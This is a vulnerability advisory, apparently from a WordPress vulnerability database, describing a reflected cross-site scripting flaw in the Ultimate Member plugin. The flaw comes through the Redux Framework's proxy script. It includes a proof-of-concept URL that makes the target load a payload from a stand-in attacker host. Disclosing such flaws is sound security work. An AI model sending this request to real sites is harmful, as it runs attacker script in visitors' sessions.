Ultimate Member 1.2.98-1.2.994 - Reflected Cross-Site Scripting (XSS)



Description
The Ultimate Member plugin utilizes the Redux Framework. The Redux Framework includes a script named ‘class.p.php’, which acts as a HTTP proxy.

Utilizing this script, it is possible to trigger a Reflected XSS attack, by loading data from a location controlled by the attacker. The data from this location is then output on the target domain, and as such JavaScript is executed under the context of the current user of the site.
Proof of Concept
http://www.example.com/wp-admin/admin-ajax.php?action=redux_p&url=http://evilsite.com/xss-payload.html

Affects Plugin

References

URL https://research.g0blin.co.uk/g0blin-00056/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 4409
Verified No
WPVDB ID 8050

Timeline

Publicly Published 2015-06-18 (almost 5 years ago)
Added 2015-06-18 (almost 5 years ago)
Last Updated 2019-10-21 (7 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin